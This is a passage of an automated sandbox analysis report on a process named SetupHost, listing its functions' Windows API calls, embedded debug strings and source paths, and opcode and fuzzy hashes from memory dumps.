                                                                                                                                                                                                                • Instruction Fuzzy Hash: 42416E71E0421A9FDB10DFA8DC48BAEB7B9EF48351F148265E915E72D0EB70AD418B60
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memset
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2221118986-0
                                                                                                                                                                                                                • Opcode ID: f5b6bf27eef4e303001baf7e9c274eedf36e6142ac1ebd5e8cc7fdb2670a1080
                                                                                                                                                                                                                • Instruction ID: 06654d89a571564f44a498e14b46cbd67557651740d69102ce900303adfc0276
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f5b6bf27eef4e303001baf7e9c274eedf36e6142ac1ebd5e8cc7fdb2670a1080
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1D4193F2A417089EE320EF74C995FE7B7DCEB95310F40493EE35A86182E774A9848B54
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000010,?,00000000,?,?,?,?,00A0C207,?,?,00000000,?), ref: 00A0B9FD
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,00A0C207,?,?,00000000,?,?,?,?,?,00A0C0AE,00000000,00000000,?,00000000), ref: 00A0BA04
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,00A0C207,?,?,00000000,?,?,?,?,?,00A0C0AE,00000000,00000000,?), ref: 00A0BA35
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,00A0C207,?,?,00000000,?,?,?,?,?,00A0C0AE,00000000,00000000,?,00000000), ref: 00A0BA3C
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,00A0C207,?,?,00000000,?,?,?,?,?,00A0C0AE,00000000,00000000,?), ref: 00A0BA55
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,00A0C207), ref: 00A0BA5C
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,00A0C207,?,?,00000000,?,?,?,?,?,00A0C0AE,00000000,00000000,?), ref: 00A0BA6A
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,00A0C207), ref: 00A0BA71
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$AllocFree
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 756756679-0
                                                                                                                                                                                                                • Opcode ID: e12bfa0b17310e843423ce4083517f50f6254ba44f02aa8bce9b4f2815aeccb6
                                                                                                                                                                                                                • Instruction ID: d7ab87a5a9ca1f241371fb6b67a01f8e477f5a6040cf1ef92b6fe543498b607b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e12bfa0b17310e843423ce4083517f50f6254ba44f02aa8bce9b4f2815aeccb6
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C621C376714305ABC714DFE8ED88ABF7ABDEB88390719856CB506C7250DA74CC028660
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,009DE0F4,?,00000000,00000000,009DE358,?,?,00000000), ref: 009E7138
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,009DE0F4), ref: 009E713F
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,009DE0F4,?,00000000,00000000,009DE358,?,?,00000000), ref: 009E7168
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,009DE0F4), ref: 009E716F
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,00000000,00000000,?,009DE0F4,?,00000000,00000000,009DE358,?,?,00000000), ref: 009E7190
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,009DE0F4), ref: 009E7197
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000000,?,009DE0F4,?,00000000,00000000,009DE358,?,?,00000000), ref: 009E71A8
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,009DE0F4), ref: 009E71AF
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$FreeProcess
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3859560861-0
                                                                                                                                                                                                                • Opcode ID: ac64ca5c7c18147af0582f0b80b868833f68aca19b50fdd744b8586e0510e8bb
                                                                                                                                                                                                                • Instruction ID: 40ac5bf24076267eb9bdeee457033fb325b174ff1455153cab6dee1d9bf643cd
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ac64ca5c7c18147af0582f0b80b868833f68aca19b50fdd744b8586e0510e8bb
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E1211A7160C342ABEB21DFE6DC48B6AB7BCAB04796F108058A81A96191D730DC02CA65
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • TheElement != TheElement.InvalidValue(), xrefs: 009CAC46
                                                                                                                                                                                                                • Not-null check failed: Result, xrefs: 009CABFB
                                                                                                                                                                                                                • Root != Root.InvalidValue(), xrefs: 009CABE5
                                                                                                                                                                                                                • onecore\base\xml\udom_microdom.cpp, xrefs: 009CAC53
                                                                                                                                                                                                                • MicrodomImplementation::CMicrodom_IRtlMicrodomTearoff::GetXml, xrefs: 009CAC60
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memset
                                                                                                                                                                                                                • String ID: MicrodomImplementation::CMicrodom_IRtlMicrodomTearoff::GetXml$Not-null check failed: Result$Root != Root.InvalidValue()$TheElement != TheElement.InvalidValue()$onecore\base\xml\udom_microdom.cpp
                                                                                                                                                                                                                • API String ID: 2221118986-716823960
                                                                                                                                                                                                                • Opcode ID: fa3781b9af8cecfbdbef3923d6b814c8b913b4d75582d12c7ac328e669f151c4
                                                                                                                                                                                                                • Instruction ID: 32ed8f37bc2d4d7df0e7295fe41b42ce71e51cc758211e08049099b5080743b7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: fa3781b9af8cecfbdbef3923d6b814c8b913b4d75582d12c7ac328e669f151c4
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5451BB7280870A9FC710DF24C444A9BB7E5EFC9718F018A1DF9916B290D775EA09CB93
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,-00000030,00000002,?,00000000,00000000,?,?,000000FF,00000000,00000000,00000001), ref: 009EE463
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 009EE46A
                                                                                                                                                                                                                • memcpy.MSVCRT ref: 009EE4E0
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009EE532
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009EE539
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$AllocFreememcpy
                                                                                                                                                                                                                • String ID: FltCommStubCreateChild
                                                                                                                                                                                                                • API String ID: 3405790324-3059287848
                                                                                                                                                                                                                • Opcode ID: c0cbf2573c472f823ad1ccd18c7f737f56a69a02e37015eb314bd70c3300f16e
                                                                                                                                                                                                                • Instruction ID: 019ab08a2fa66ef3e262a14c65c885ef9344b53c7070af78e9d52348b7ec4255
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c0cbf2573c472f823ad1ccd18c7f737f56a69a02e37015eb314bd70c3300f16e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FA419475900255EFCB11DFA9C845AAABBF8FF48360F104529E919D7390E7349D01CBD1
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000057,?,?,?,00000000,?,?,009DE5CA,?,00000000), ref: 009E0BFE
                                                                                                                                                                                                                  • Part of subcall function 009E0F34: RtlAcquireResourceExclusive.NTDLL(00000000,00000001), ref: 009E0F4B
                                                                                                                                                                                                                  • Part of subcall function 009E0F34: GetProcessHeap.KERNEL32(00000000,?,00000000,009DE5CA,?,009E0BBA,?,?,?,00000000,?,?,009DE5CA,?,00000000), ref: 009E0F78
                                                                                                                                                                                                                  • Part of subcall function 009E0F34: HeapFree.KERNEL32(00000000,?,?), ref: 009E0F7F
                                                                                                                                                                                                                  • Part of subcall function 009E0F34: RtlReleaseResource.NTDLL(00000000), ref: 009E0F96
                                                                                                                                                                                                                  • Part of subcall function 009E0F34: GetProcessHeap.KERNEL32(00000000,?,00000000,009DE5CA,?,009E0BBA,?,?,?,00000000,?,?,009DE5CA,?,00000000), ref: 009E0FA6
                                                                                                                                                                                                                  • Part of subcall function 009E0F34: HeapFree.KERNEL32(00000000,?,?), ref: 009E0FAD
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$FreeProcessResource$AcquireErrorExclusiveLastRelease
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2402236156-0
                                                                                                                                                                                                                • Opcode ID: ae2276e5d58696ed369f881fc4807fce09ac9b7423e8690d843d669e8ac8859c
                                                                                                                                                                                                                • Instruction ID: 2041488bf32e1d7f0e1f5bdb3dbb357171ae120987029538c9ba4f61585b6c4f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ae2276e5d58696ed369f881fc4807fce09ac9b7423e8690d843d669e8ac8859c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 84418275A0424ADFCF21CFAAC880A6EB7BAFFC4718B288529E455D7340D7B09D81CB50
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,?,?,00000000,?,?,?), ref: 009B9A1F
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?), ref: 009B9A26
                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000,?,?), ref: 009B9A48
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?), ref: 009B9A52
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,?,?,?), ref: 009B9A83
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?), ref: 009B9A8A
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$AllocByteCharErrorFreeLastMultiWide
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 4078814206-0
                                                                                                                                                                                                                • Opcode ID: db00308987fbb6694e8ca7a7e357444216e5db4d9a83cbd133e4528cebc4a45b
                                                                                                                                                                                                                • Instruction ID: 8805a8085a10dcb98cb4580f78f85970dbedc0d667ec0d4ea7408da7d048035f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: db00308987fbb6694e8ca7a7e357444216e5db4d9a83cbd133e4528cebc4a45b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C731E636610205AB8F15EBB88A89AFE767AABC4370725447DFB0BD7340DE34DD029750
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32(?,C0000000,00000000,00000000,00000002,00000100,00000000,00A125D0,00000030,009FF27C,?,?,?), ref: 009FF09D
                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(00000000,00000000,?,00000000,00000000,?,C0000000,00000000,00000000,00000002,00000100,00000000,00A125D0,00000030,009FF27C,?), ref: 009FF0BA
                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000000,?,C0000000,00000000,00000000,00000002,00000100,00000000,00A125D0,00000030,009FF27C,?,?,?), ref: 009FF0C1
                                                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,?,?,C0000000,00000000,00000000,00000002,00000100,00000000,00A125D0,00000030,009FF27C,?,?,?), ref: 009FF0E1
                                                                                                                                                                                                                • CreateFileMappingW.KERNEL32 ref: 009FF0F8
                                                                                                                                                                                                                • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,C0000000,00000000,00000000,00000002,00000100,00000000,00A125D0,00000030,009FF27C,?), ref: 009FF10B
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CurrentFile$Process$CreateMappingSizeThreadView
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3521580201-0
                                                                                                                                                                                                                • Opcode ID: 58f6ea47f4bbd0f5f094eafd29985aa48ec0b741b414e41a6758db2b646e5563
                                                                                                                                                                                                                • Instruction ID: 5bf14886b7fdecfcafe73b8f65fabd92e516ea1b7326ef8a41e6bf3cdd576d02
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 58f6ea47f4bbd0f5f094eafd29985aa48ec0b741b414e41a6758db2b646e5563
                                                                                                                                                                                                                • Instruction Fuzzy Hash: CC411BB1A05219EFDB15CFA8DD84ABEBBB8FF49754F148229E911E7290D7305D028B60
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _wcsicmp
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2081463915-0
                                                                                                                                                                                                                • Opcode ID: 5584ebcefb1ac2e9b476c54d769d3913d10c7a0ae1f8af81c90b084b32aeb16e
                                                                                                                                                                                                                • Instruction ID: 7405e883fa16826629a5ca41dd25789a824bdcd5706cafd4cd90441fc99fe318
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5584ebcefb1ac2e9b476c54d769d3913d10c7a0ae1f8af81c90b084b32aeb16e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E231B332204651DBDB139F5AD845BAE77A9EF8476AF168015F905CB1F2EB70CC41CB50
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,?,{6c104913-738b-4411-a4ec-8b594e314f6b},00000000,?,009A6985), ref: 009BBBBE
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 009BBBC5
                                                                                                                                                                                                                • memcpy.MSVCRT ref: 009BBBE8
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,{6c104913-738b-4411-a4ec-8b594e314f6b},00000000,?,009A6985), ref: 009BBC14
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009BBC1B
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • {6c104913-738b-4411-a4ec-8b594e314f6b}, xrefs: 009BBB38
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$AllocFreememcpy
                                                                                                                                                                                                                • String ID: {6c104913-738b-4411-a4ec-8b594e314f6b}
                                                                                                                                                                                                                • API String ID: 3405790324-3860172206
                                                                                                                                                                                                                • Opcode ID: 829945c3f306b33d1a86fe21d162074b2f362036771d2cd6d53045dadec15c93
                                                                                                                                                                                                                • Instruction ID: 32b50f4ade78358c81b94f84fb4652317945c3d10707836686cab4562776d39b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 829945c3f306b33d1a86fe21d162074b2f362036771d2cd6d53045dadec15c93
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7231F736A002159BCB15DFA98A85AFEBBB6DFC4730B154429FA05D7280DFB4CD029750
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000004,08000100,00000000), ref: 009E5834
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,00000000,009DE358,?,?,00000000), ref: 009E5880
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 009E5891
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,00000000,009DE358,?,?,00000000), ref: 009E589E
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,00000000), ref: 009E58A5
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,00000000,009DE358,?,?,00000000), ref: 009E58B0
                                                                                                                                                                                                                  • Part of subcall function 009ECBCF: GetProcessHeap.KERNEL32(00000000,00100010,00000000,009E5849,?,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,00000000,009DE358), ref: 009ECBDB
                                                                                                                                                                                                                  • Part of subcall function 009ECBCF: HeapAlloc.KERNEL32(00000000,?,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,00000000,009DE358,?,?,00000000), ref: 009ECBE2
                                                                                                                                                                                                                  • Part of subcall function 009E5C92: GetProcessHeap.KERNEL32(00000008,00000294,00000000,00000000,00000000), ref: 009E5CCD
                                                                                                                                                                                                                  • Part of subcall function 009E5C92: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,009E586F,00000000), ref: 009E5CD4
                                                                                                                                                                                                                  • Part of subcall function 009E5C92: memset.MSVCRT ref: 009E5D16
                                                                                                                                                                                                                  • Part of subcall function 009ECBFE: WriteFile.KERNEL32(00000000,00000010,?,00000000,00000000), ref: 009ECC23
                                                                                                                                                                                                                  • Part of subcall function 009ECBFE: SetLastError.KERNEL32(000000EA,?,009ECCB1,00000000,00000000,00000000,00000000,00000000,?,009E5922,00000004,00000000,00000000), ref: 009ECC3A
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$ErrorLastProcess$AllocFile$CloseCreateFreeHandleWritememset
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3175680964-0
                                                                                                                                                                                                                • Opcode ID: 8f8a2b251966e6dafcf56ca73fd424ce32d81719289dfec432b079f76f9209fe
                                                                                                                                                                                                                • Instruction ID: abb3326188f1f77edfc271efa4a0e22656c5202b74d158f6dd94a49f39e433d1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8f8a2b251966e6dafcf56ca73fd424ce32d81719289dfec432b079f76f9209fe
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2011B672F01A407FD726EBBA4C49B6F3AADDBC4765F164524F915D7390DA30CC028690
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetLastError.KERNEL32(23FAFFD7,00000000,0052B3E8,?,00A1103B,000000FF,?,00A01659,?,23FAFFD7,?,?,00000000,00000000,00A11005,000000FF), ref: 00A01517
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,23FAFFD7,00000000,0052B3E8,?,00A1103B,000000FF,?,00A01659,?,23FAFFD7,?,?,00000000,00000000), ref: 00A01570
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,00A01659), ref: 00A01577
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • CBlackboard::~CBlackboard, xrefs: 00A0152E
                                                                                                                                                                                                                • onecore\base\ntsetup\panther\engine\bb.cpp, xrefs: 00A01533
                                                                                                                                                                                                                • CBlackboard::m_lAccessSpinLock = %d for BB="%s", xrefs: 00A01542
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$ErrorFreeLastProcess
                                                                                                                                                                                                                • String ID: CBlackboard::m_lAccessSpinLock = %d for BB="%s"$CBlackboard::~CBlackboard$onecore\base\ntsetup\panther\engine\bb.cpp
                                                                                                                                                                                                                • API String ID: 406640338-2602513363
                                                                                                                                                                                                                • Opcode ID: c028a505ab5214114052b43d2167df5c6c15fb855aa3c8e047d39347c68a1f35
                                                                                                                                                                                                                • Instruction ID: e957fa8d94d91aa81c31064ee6745cb19d4fb8898945a533e825a338d2aae15d
